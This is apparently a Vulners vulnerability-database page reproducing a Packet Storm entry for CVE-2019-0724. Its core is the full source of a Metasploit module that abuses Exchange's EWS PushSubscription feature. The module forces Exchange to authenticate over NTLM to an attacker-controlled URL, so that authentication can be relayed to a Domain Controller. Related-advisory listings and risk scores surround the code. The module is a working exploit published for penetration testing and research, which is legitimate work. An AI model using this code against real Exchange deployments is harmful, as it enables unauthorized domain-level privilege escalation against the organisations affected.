Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Microsoft Exchange Privilege Escalation

🗓️ 01 Sep 2024 00:00:00Reported by _dirkjan, Petros Koutroumpis, metasploit.comType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 328 Views

Microsoft Exchange Privilege Escalation - CVE-2019-0724, NTLM authentication relay to Domain Controller, Based on @_dirkjan's work

Related
Code
ReporterTitlePublishedViews
Family
Information Security Automation		Vulnerability Management at Tinkoff Fintech School
4 Mar 201910:38
avleonov
Circl		CVE-2019-0724
18 Oct 201911:36
circl
Check Point Advisories		Microsoft Exchange Privilege Escalation (CVE-2019-0724)
30 Dec 201900:00
checkpoint_advisories
CVE		CVE-2019-0724
6 Mar 201900:00
cve
Cvelist		CVE-2019-0724
6 Mar 201900:00
cvelist
Microsoft KB		Cumulative Update 22 for Exchange Server 2013
12 Feb 201908:00
mskb
Microsoft KB		Cumulative Update 1 for Exchange Server 2019
12 Feb 201908:00
mskb
Microsoft KB		Cumulative Update 12 for Exchange Server 2016
12 Feb 201908:00
mskb
Microsoft KB		Update Rollup 26 for Exchange Server 2010 Service Pack 3
12 Feb 201908:00
mskb
Kaspersky		KLA11420 Multiple vulnerabilities in Microsoft Exchange Server
12 Feb 201900:00
kaspersky
Rows per page
`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::HttpClient  
  
def initialize  
super(  
'Name' => 'Microsoft Exchange Privilege Escalation Exploit',  
'Description' => %q{  
This module exploits a privilege escalation vulnerability found in Microsoft Exchange - CVE-2019-0724  
Execution of the module will force Exchange to authenticate to an arbitrary URL over HTTP via the Exchange PushSubscription feature.  
This allows us to relay the NTLM authentication to a Domain Controller and authenticate with the privileges that Exchange is configured.  
The module is based on the work by @_dirkjan,  
},  
'Author' => [  
'_dirkjan', # Discovery and PoC  
'Petros Koutroumpis' # Metasploit  
],  
'References' =>  
[  
[ 'CVE', '2019-0724' ],  
[ 'URL', 'https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin/' ]  
],  
'DefaultOptions' =>  
{  
'SSL' => true,  
'RPORT' => 443  
},  
'License' => MSF_LICENSE,  
'DisclosureDate' => '2019-01-21'  
)  
  
register_options(  
[  
OptString.new('USERNAME', [ true, "Username of any domain user with a mailbox on Exchange"]),  
OptString.new('PASSWORD', [ true, "Password or password hash (in LM:NT format) of the user"]),  
OptString.new('DOMAIN', [ true, "The Active Directory domain name"]),  
OptString.new('TARGETURI', [ true, "Exchange Web Services API endpoint", "/EWS/Exchange.asmx" ]),  
OptString.new('EXCHANGE_VERSION', [ true, "Version of Exchange (2013|2016)", "2016" ]),  
OptString.new('ATTACKER_URL', [ true, "Attacker URL", nil ])  
])  
end  
  
def run  
  
domain = datastore['DOMAIN']  
uri = datastore['TARGETURI']  
exchange_version = datastore['EXCHANGE_VERSION']  
attacker_url = datastore['ATTACKER_URL']  
  
req_data = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>" + "\r\n"  
req_data += "<soap:Envelope xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\" xmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\">" + "\r\n"  
req_data += "<soap:Header>" + "\r\n"  
req_data += "<t:RequestServerVersion Version=\"Exchange"+exchange_version+"\" />" + "\r\n"  
req_data += "</soap:Header>" + "\r\n"  
req_data += "<soap:Body>" + "\r\n"  
req_data += "<m:Subscribe>" + "\r\n"  
req_data += "<m:PushSubscriptionRequest SubscribeToAllFolders=\"true\">" + "\r\n"  
req_data += "<t:EventTypes>" + "\r\n"  
req_data += "<t:EventType>NewMailEvent</t:EventType>" + "\r\n"  
req_data += "<t:EventType>ModifiedEvent</t:EventType>" + "\r\n"  
req_data += "<t:EventType>MovedEvent</t:EventType>" + "\r\n"  
req_data += "</t:EventTypes>" + "\r\n"  
req_data += "<t:StatusFrequency>1</t:StatusFrequency>" + "\r\n"  
req_data += "<t:URL>"+attacker_url+"</t:URL>" + "\r\n"  
req_data += "</m:PushSubscriptionRequest>" + "\r\n"  
req_data += "</m:Subscribe>" + "\r\n"  
req_data += "</soap:Body>" + "\r\n"  
req_data += "</soap:Envelope>" + "\r\n"  
  
http = nil  
  
http = Rex::Proto::Http::Client.new(  
rhost,  
rport.to_i,  
{},  
ssl,  
ssl_version,  
proxies,  
datastore['USERNAME'],  
datastore['PASSWORD']  
)  
  
http.set_config({ 'preferred_auth' => 'NTLM' })  
http.set_config({ 'domain' => domain })  
add_socket(http)  
  
  
req = http.request_raw({  
'uri' => uri,  
'method' => 'POST',  
'ctype' => 'text/xml; charset=utf-8',  
'headers' => {  
'Accept' => 'text/xml'  
},  
'data' => req_data  
})  
  
begin  
res = http.send_recv(req)  
xml = res.get_xml_document  
http.close  
rescue ::Rex::ConnectionError, Errno::ECONNREFUSED, Errno::ETIMEDOUT, ::Rex::HostUnreachable  
print_error("Connection failed")  
rescue OpenSSL::SSL::SSLError, OpenSSL::Cipher::CipherError  
print_error "SSL negotiation failed"  
end  
  
if res.nil?  
fail_with(Failure::Unreachable, 'Connection failed')  
end  
  
if res.code == 401  
fail_with(Failure::NoAccess, 'Server returned HTTP status 401 - Authentication failed')  
end  
  
if xml.nil?  
fail_with(Failure::UnexpectedReply, "Empty reply from server")  
end  
  
if res.code == 500 && xml.text.include?("ErrorInvalidServerVersion")  
fail_with(Failure::BadConfig, "Server does not accept this Exchange dialect. Specify a different Exchange version")  
end  
  
unless res.code == 200  
fail_with(Failure::UnexpectedReply, "Server returned HTTP #{res.code}: #{xml.text}")  
end  
  
print_good("Exchange returned HTTP status 200 - Authentication was successful")  
  
if xml.text.include? "ErrorMissingEmailAddress"  
fail_with(Failure::BadConfig, "The user does not have a mailbox associated. Try a different user.")  
end  
  
unless xml.text.include? "NoError"  
fail_with(Failure::Unknown, "Unknown error. Response: #{xml.text}")  
end  
  
print_good("API call was successful")  
  
end  
end  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
01 Sep 2024 00:00Current
7High risk
Vulners AI Score7
CVSS 3.18.1
CVSS 29.3
EPSS0.61355
microsoft exchangeprivilege escalationcve-2019-0724ntlm authenticationdomain controller_dirkjan discoverymetasploit
328